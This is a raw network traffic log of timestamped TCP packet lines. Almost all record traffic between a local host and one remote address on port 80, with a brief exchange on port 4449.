Dec 10, 2024 11:11:18.597055912 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.598170042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.598222971 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.598472118 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.598524094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.599416971 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.599488974 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.599565029 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.599617004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.600742102 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.600802898 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.600831985 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.600881100 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.602035999 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.602106094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.602119923 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.602169991 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.603282928 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.603326082 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.603408098 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.603454113 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.604557037 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.604604006 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.604640007 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.604731083 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.605870962 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.605923891 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.606122017 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.606167078 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.607265949 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.607326031 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.607393026 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.607444048 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.608346939 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.608408928 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.608520985 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.608580112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.609652042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.609729052 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.609750986 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.609795094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.610940933 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.611001015 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.611032963 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.611078978 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.612237930 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.612288952 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.612346888 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.612394094 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.613507986 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.613559961 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.613652945 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.613753080 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.614809990 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.614862919 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.614896059 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.614955902 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.616070032 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.616132975 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.616144896 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.616213083 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.617328882 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.617388010 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.617441893 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.617583990 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.618716002 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.618761063 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.618805885 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.618870020 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.619906902 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.619976997 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.620009899 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.620052099 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.621192932 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.621243954 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.621320963 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.621381044 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.622478962 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.622545004 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.622648001 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.622725964 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.623745918 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.623795986 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.623831034 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.623881102 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.625080109 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.625153065 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.625204086 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.625253916 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.626336098 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.626405001 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.626436949 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.626496077 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.627604008 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.627664089 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.627733946 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.627782106 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.628989935 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.629096985 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.629101038 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.629147053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.630167961 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.630239010 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.630270958 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.630347013 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.631419897 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.631465912 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.631578922 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.631648064 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.632781029 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.632829905 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.632889032 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.632952929 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.634068012 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.634114027 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.634186029 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.634242058 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.635309935 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.635354996 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.635493040 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.635543108 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.636590958 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.636645079 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.636729956 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.636776924 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.637917995 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.637979031 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.638058901 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.638106108 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.639137030 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.639209986 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.639241934 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.639296055 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.640889883 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.640961885 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.640986919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.641036987 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.642251968 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.642343998 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.642344952 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.642386913 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.643297911 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.643340111 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.643456936 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.643496037 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.644330978 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.644401073 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.644407034 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.644460917 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.645626068 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.645678043 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.645728111 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.645781994 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.646843910 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.646934032 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.647018909 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.647067070 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.648128986 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.648185015 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.648248911 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.648293018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.649422884 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.649492979 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.649554968 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.649604082 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.650672913 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.650738001 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.650738955 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.650793076 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.650880098 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:18.691889048 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:18.771353960 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.771430016 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.771442890 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.771483898 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.771997929 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.772088051 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.772133112 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.772176027 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.773097992 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.773149967 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.773178101 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.773322105 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.774221897 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.774286032 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.780502081 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.780595064 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.780647039 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.780704975 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.781049967 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.781116009 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.781188011 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.781249046 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.782227993 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.782279015 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.782340050 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.782392025 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.783386946 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.783432007 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.783545971 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.783591032 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.784589052 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.784648895 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.784699917 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.784750938 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.785677910 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.785717010 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.785830021 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.785872936 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.786891937 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.786940098 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.786963940 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.786998987 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.787981033 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.788058043 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.788085938 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.788126945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.789155960 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.789200068 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.789299011 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.789401054 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.790347099 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.790472031 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.790525913 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.790590048 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.791481018 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.791534901 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.791565895 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.791608095 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.792695999 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.792752981 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.792768002 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.792824984 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.793901920 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.793970108 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.793975115 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.794019938 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.794977903 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.795026064 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.795059919 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.795108080 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.796118021 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.796184063 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.796211958 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.796255112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.797257900 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.797328949 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.797359943 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.797415018 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.798449039 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.798501968 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.798558950 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.798629045 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.799747944 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.799798965 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.799922943 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.799968958 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.800749063 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.800792933 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.800870895 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.800965071 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.801933050 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.801983118 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.802045107 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.802089930 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.803086042 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.803136110 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.803255081 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.803329945 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.804235935 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.804280996 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.804347038 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.804398060 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.805497885 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.805577040 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.805716991 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.805766106 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.806572914 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.806639910 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.806667089 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.806709051 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.807728052 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.807781935 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.807862043 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.807904005 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.808914900 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.808984041 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.809072971 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.809133053 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.810045958 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.810105085 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.810137033 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.810200930 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.811206102 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.811271906 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.811305046 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.811352968 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.812366962 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.812408924 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.812478065 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.812529087 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.813527107 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.813635111 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.813648939 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.813710928 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.814686060 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.814735889 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.814821959 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.814882040 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.815861940 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.815917969 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.815943956 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.816004992 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.816989899 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.817018986 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.817042112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.817042112 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.818207979 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.818264961 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.818557978 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.818612099 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.819689035 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.819700003 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.819812059 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.819812059 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.820507050 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.820549011 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.820580959 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.820631027 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.821728945 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.821777105 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.821799994 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.821815968 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.822828054 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.822896957 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.822925091 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.822958946 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.824004889 CET	80	49850	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:18.824055910 CET	49850	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:18.824091911 CET	80	49850	185.215.113.16	192.168.2.5
